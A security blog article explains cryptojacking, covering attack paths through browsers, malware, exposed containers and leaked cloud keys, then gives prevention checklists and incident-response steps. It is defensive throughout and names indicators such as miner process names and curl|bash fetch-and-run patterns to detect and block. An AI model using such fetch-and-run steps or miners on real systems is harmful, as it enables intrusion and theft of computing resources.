What Is Cryptojacking and How Can I Prevent It?

By / October 2, 2025

What Is Cryptojacking and How Can I Prevent It?

TL;DR

Cryptojacking is the unauthorized use of your computing power to mine cryptocurrency. Attackers inject miners via websites, browser extensions, malware, misconfigured cloud services (e.g., exposed Kubernetes/Docker), leaked keys, and weak auth. It quietly slows systems, inflates cloud bills, shortens device lifespans, and can be a smoke screen for deeper compromise. Major security agencies (CISA/NSA) and cloud providers (Google Cloud, AWS) have all issued guidance because a large share of compromised cloud instances are abused for mining. Protect yourself with least-privilege IAM, MFA, hardening Kubernetes/EKS, container image scanning, runtime policies, egress controls, WAF/IPS, ad/script blocking, patching, and continuous monitoring/alerts from tools like GuardDuty, SCC, and EDR. (CISA)

What exactly is cryptojacking?

Cryptojacking (sometimes called illicit cryptomining) happens when a malicious actor hijacks a device, browser, VM, container, or cluster to run cryptocurrency-mining software without the owner’s consent. Instead of stealing your data, they steal your CPU/GPU cycles and electricity. On the surface this may look “less harmful” than ransomware, but it drains performance, increases costs, and signals that an attacker is already inside your environment. Governments and vendors define it similarly: unauthorized use of computing resources to mine crypto. (CISA)

Why is cryptojacking so common?

  • It’s low risk / high reward for attackers. Mining is automated, payouts are pseudonymous, and infections can persist undetected for months.
  • Cloud scale makes it lucrative. Attackers love compromised cloud accounts, because elastic compute = elastic profit. Google’s own threat intel found that 86% of recently compromised Google Cloud instances were used for cryptocurrency mining, often within seconds of compromise—underscoring automation. (Google)
  • Defenders often focus elsewhere. Teams prioritize ransomware and data theft; meanwhile weak credentials, leaked keys, and misconfigurations open the door to miners (exactly the pattern Google and CISA highlight). (Google Cloud)

How cryptojacking happens: the main attack paths

1) In-browser miners (drive-by or injected)

Attackers inject JavaScript into websites (via ad networks, CMS plug-ins, or XSS). When visitors open a page, their CPU spikes as the script mines in the background. This technique resurfaces periodically, especially on poorly secured sites and extensions. Guidance from security agencies categorizes these as resource-hijacking attacks that abuse client machines at scale. (CISA)

2) Malware on laptops and phones

Traditional malware installs miner binaries as a background service, sometimes with a watchdog that restarts if killed. Endpoint security products, EDR, and OS hardening are the countermeasures. (Fortinet)

3) Containers & Kubernetes clusters

Misconfigured Docker APIs, Kubernetes dashboards, exposed Argo Workflows, or permissive cluster roles are routinely exploited to drop miners. The NSA/CISA Kubernetes Hardening Guidance and analyses around it emphasize cryptomining as a prevalent abuse once clusters are compromised. (CISA)

4) Cloud VMs (IaaS)

Common entry points include leaked API keys, weak/no passwords, unpatched software, and default images. Google Cloud’s best-practices doc enumerates these and provides practical mitigations (MFA, secret hygiene, RBAC, network controls, monitoring). AWS publishes parallel detections and workflows in GuardDuty (with recent posts on evaluating findings and investigating EC2/EKS). (Google Cloud)

5) Third-party software or supply chain

Unvetted container images or compromised packages can ship miners. This affects on-prem and cloud alike—image signing, SBOMs, and scanning reduce risk. (Google Cloud)

What cryptojacking looks like (symptoms & indicators)

On endpoints (PCs/phones):

  • Fans spin up, CPU/GPU pegged even when idle; battery drains fast on laptops/phones.
  • Browser tabs consume unusual CPU; unknown extensions installed.
  • EDR or antivirus flags “coinminer” processes.

On servers/containers/cloud:

  • Sudden cost spikes (compute, egress, storage) or quota exhaustion.
  • New outbound connections to mining pools or suspicious DNS (GuardDuty flags patterns like bitcoin/monero pool lookups).
  • Unusual process trees (e.g., xmrig, minerd, kdevtmpfsi), or shell scripts that fetch payloads via curl|bash.
  • Daemonsets running cluster-wide, or unexpected privileged pods in Kubernetes.
  • IAM anomalies (new keys, unusual regions), plus alerts from cloud-native detectors (Google SCC, AWS GuardDuty). (Repost)

Real-world scale and impact

  • Cloud compromises skew heavily to mining: Google observed that 86% of compromised GCP instances they studied were used for cryptomining; in many cases miners were downloaded within 22 seconds of compromise—illustrating attacker automation and why rapid detection matters. (Google)
  • Kubernetes is a frequent target: Multiple advisories—CISA/NSA and vendor research—call out miners abusing cluster compute. Hardening guidance aims to prevent exactly this. (CISA)

The risks go beyond your electric bill

  1. Operational degradation: Production latency, outages, and missed SLOs due to resource starvation.
  2. Financial loss: Direct energy/compute costs and potential cloud overage bills.
  3. Security blind spots: Cryptojacking can mask lateral movement; if an attacker installed a miner, they might also exfiltrate secrets or prep for ransomware.
  4. Compliance & reputation: Data exposure risks increase once hosts are compromised—even if the initial goal was “just” mining. Agencies emphasize treating cryptomining as an incident that warrants full scoping and containment. (CISA)

How to prevent cryptojacking (individuals)

  1. Harden your browser
    • Use a reputable ad/tracker/script blocker and disable “allow cryptomining” permissions where available.
    • Avoid sideloading extensions; review existing extensions for abuse.
  2. Keep systems up to date
    • Patch OS, browsers, and plug-ins quickly; many in-browser mining scripts piggyback on web vulns.
  3. Install endpoint protection
    • Enable built-in protections and add an EDR/antivirus that detects miner binaries and suspicious behaviors.
  4. Use strong authentication everywhere
    • MFA on email, cloud storage, GitHub, and exchange/wallet accounts to prevent account takeovers that may be repurposed for mining infra. Agencies and cloud providers repeatedly stress MFA and strong auth. (Google Cloud)
  5. Practice secret hygiene
    • Do not store API keys or private keys in plaintext; use password managers, hardware keys, and encrypted vaults.
  6. Monitor device performance
    • Unexpected heat, noise, or battery drain? Check Task Manager/Activity Monitor for unknown CPU-hungry processes.

How to prevent cryptojacking (organizations & teams)

Below is a practical, prioritized checklist blending guidance from CISA/NSA and major cloud providers.

A) Identity, access, and secrets

  • Enforce MFA for all cloud console users and service accounts; use phishing-resistant methods where possible.
  • Least privilege IAM: grant only what’s required; rotate keys and disable access keys for interactive humans.
  • Secrets management: move API keys, tokens, and credentials to a managed secrets store (e.g., cloud KMS/Secrets Manager); scan repos for leaked keys and set org-wide pre-commit hooks. Google’s best practices explicitly call out leaked credentials as a major vector. (Google Cloud)

B) Cloud & VM hardening

  • Baseline images and CIS-hardened OS builds; remove compilers and unnecessary tools.
  • Network egress control: deny‐by‐default outbound rules; explicitly block known mining pools and unlabeled DNS categories.
  • Continuous posture management (CSPM): detect exposed services, weak SSH, open storage buckets.
  • Auto-remediation: when a VM matches a miner IOC, isolate via tags/security groups and attach a forensics workflow.

C) Containers & Kubernetes

  • Follow NSA/CISA Kubernetes Hardening:
    • Disable anonymous auth, use RBAC properly, lock down etcd, enforce network policies, and restrict pod security/privileged capabilities.
    • Scan images for malware and miners; sign images, verify at admission; enforce read-only root FS; drop net-raw.
    • Monitor for DaemonSets you didn’t deploy and anomalous CPU usage across nodes. (CISA)
  • Lock down Docker: never expose the Docker daemon on the internet; authenticate the API; apply resource limits so a single container can’t starve a node.

D) Detection, monitoring, and response

  • Cloud-native detectors:
    • Google Cloud Security Command Center (SCC) has cryptomining protection and response programs for customers, plus prescriptive “best practices” for preventing such attacks. (Google Cloud)
    • AWS GuardDuty detects EC2/EKS cryptomining behaviors and suspicious DNS; AWS has current blogs on testing detections and investigating findings with Detective. (Amazon Web Services, Inc.)
  • Set actionable alerts on:
    • CPU anomalies, unexpected egress, new outbound domains to mining pools, creation of unexpected IAM users/keys, and sudden spending spikes.
  • Integrate EDR/XDR: ensure miner families (e.g., XMRig) map to alerting rules; watch for shell pipelines that fetch binaries.
  • Cost guardrails: budget alerts and spend limits to catch sudden compute bursts.

E) Web & email security

  • WAF and RASP to stop web-app injections that lead to in-browser miners.
  • Email security and sandboxing to prevent miner droppers from phishing.

F) Governance, training, and incident process

  • Run tabletop exercises: simulate “mining detected in prod” and practice isolation + forensics.
  • Asset ownership: every cluster/VM has a named owner; ghost workloads get culled.
  • Developer enablement: teach engineers how to store secrets, sign images, and read GuardDuty/SCC alerts.

Step-by-step response if you suspect cryptojacking

  1. Contain
    • Isolate the host/VM/pod from the network. In cloud, detach from load balancers / set a quarantine SG / cordon+drain the node.
    • If Kubernetes, delete malicious DaemonSets/Pods, rotate service account tokens, and revoke any suspicious cluster roles.
  2. Preserve evidence
    • Snapshot disks, collect memory (where feasible), export logs (Cloud Logging/CloudTrail/CloudWatch), and save suspicious binaries/URLs.
  3. Eradicate
    • Kill miner processes, rebuild from clean images (don’t just stop the process), rotate credentials, and patch exploited vulnerabilities.
  4. Recover & harden
    • Reintroduce hosts with hardened configs, tighter egress rules, admission controls, and monitor closely for re-infection.
  5. Report & review
    • Notify stakeholders; if the incident involved potential data exposure, follow legal/regulatory steps; document lessons learned and update baselines. Agencies recommend treating cryptomining as a serious indicator of compromise that merits full IR. (CISA)

Special focus: Kubernetes/EKS/containers

Because containers make it easy to run lightweight miners everywhere, clusters are a prime target. The NSA/CISA guidance and vendor blogs outline high-value basics you should bake in by default:

  • Disable anonymous access; require strong auth to the API server; RBAC least privilege.
  • Encrypt etcd and restrict access; audit logs on.
  • NetworkPolicies to restrict pod egress; block mining pools and unexpected DNS.
  • Admission control: only allow signed, scanned images; deny privileged pods and hostPath mounts unless approved.
  • Resource limits & quotas so a rogue pod can’t monopolize CPU/GPU.
  • Runtime security to detect suspicious processes (e.g., XMRig), curl | bash patterns, and outbound beaconing. (CISA)

Economics and motivations for attackers (and why this won’t disappear)

  • Predictable revenue: Mining on stolen compute is profitable even at modest coin prices when energy is “free.”
  • Automation at scale: As Google observed, automated toolchains deploy miners within seconds of compromise. That speed beats many manual IR processes, which is why automated controls (admission policies, egress blocks, budget alerts) are crucial. (Google)
  • Low visibility: Many organizations don’t alert on CPU anomalies or outbound DNS categories, giving miners a long dwell time.
  • Reusable foothold: The same access used for mining can be repurposed for lateral movement and data theft later.

Quick cheatsheet: 25+ concrete controls to stop cryptojacking

Identity & Secrets

  1. MFA everywhere (prefer phishing-resistant methods).
  2. Rotate keys; remove long-lived access keys; enforce least-privilege IAM.
  3. Managed secrets (KMS/Secrets Manager); repo scanning + commit hooks.

Network
4. Default-deny egress; allowlist only what you need.
5. Block mining pool domains/categories at DNS and firewall layers.
6. Egress alerts on new, high-entropy domains and unusual ports.

Compute & OS
7. CIS-hardened images; disable unused services/tools (curl/wget where possible).
8. System resource quotas; GPU scheduling controls.
9. EDR/XDR with miner signatures + behavior rules.

Containers & K8s
10. Admission control enforcing signed, scanned images.
11. Pod Security / Kyverno / OPA Gatekeeper policies (no privilege escalation; drop CAP_NET_RAW; read-only FS).
12. NetworkPolicies for pod egress; per-namespace quotas.
13. Monitor for DaemonSets and sudden CPU surges across nodes.
14. Disable anonymous auth; restrict etcd; enable audit logging.

Cloud posture
15. CSPM to catch exposed services and weak SSH.
16. Budget alerts and spend caps; anomaly detection on usage.
17. SCC/GuardDuty enabled with auto-response playbooks.
18. VPC Flow Logs / Cloud DNS logs feeding detection pipelines.

Web & Email
19. WAF with managed rules; DDoS/IPS protection.
20. Email gateway + sandbox; DMARC/DKIM/SPF alignment.

Browser & Endpoints
21. Script/ad blocking; extension allowlists.
22. OS & browser auto-update.
23. Encrypted DNS (with security filtering) for consumer devices.

Operations
24. Tabletop exercises for “mining in prod” scenarios.
25. Golden images and immutability: rebuild, don’t patch in place.
26. Clear ownership for every cluster/VM; decommission or quarantine unknowns.

(Controls above synthesize CISA/NSA guidance and cloud best practices.) (CISA)

Frequently asked questions

Is cryptojacking illegal?
Yes—unauthorized use of someone else’s compute is illicit in most jurisdictions and often violates anti-hacking statutes and cloud provider terms. Treat it as an incident and follow your legal/compliance process. (For official guidance, see national cyber agencies such as CISA.) (CISA)

Which coins are most common?
Miners often target privacy-focused coins like Monero (XMR) that are optimized for CPU mining and offer more anonymity. (The specific coin can vary; the defense doesn’t change.)

Can a browser tab really cause high bills?
A single tab won’t spike cloud bills, but on endpoints it drains batteries, overheats, and slows work. In enterprise fleets, widespread drive-by mining can degrade productivity and mask broader compromise. (CISA)

Why do cloud incidents skew to mining instead of data theft?
Because mining is easy to monetize instantly. Google Cloud’s study shows the bias toward miners among compromised instances, and also found many compromises stemmed from weak auth, leaked keys, and misconfigs—all quickly exploited by automated bots. Fix the basics first. (Google)

Recommended references & further reading

  • CISA: “Defending Against Illicit Cryptocurrency Mining Activity” – baseline definitions, risks, and mitigations. (CISA)
  • Google Cloud (Threat Horizons, Nov 2021): 86% of analyzed compromised Cloud instances used for mining; details on initial access and speed to miner install. (Google)
  • Google Cloud Architecture: “Best practices for protecting against cryptocurrency mining attacks” – hands-on controls for identities, secrets, and networks in GCP. (Google Cloud)
  • NSA/CISA: “Kubernetes Hardening Guidance” – configuration baselines to prevent cluster abuse, including cryptomining. (CISA)
  • AWS: GuardDuty cryptomining detections; posts on testing detections and investigating with Detective (EC2/EKS). (Amazon Web Services, Inc.)

Bottom line

Cryptojacking is not benign—it is a security incident and a financial drain that often indicates a broader compromise. The good news: most successful attacks exploit basic gaps (weak auth, leaked keys, exposed services, unscanned images). Close those gaps with the controls and playbooks above, and back them with continuous monitoring and automatic response from your cloud and endpoint security stack. If you do one thing today: turn on MFA everywhere, audit your cloud for exposed services, and enable cryptomining detections (GuardDuty/SCC/EDR). It’s the fastest path to shrinking this threat. (Google Cloud)

Related Posts

Scroll to Top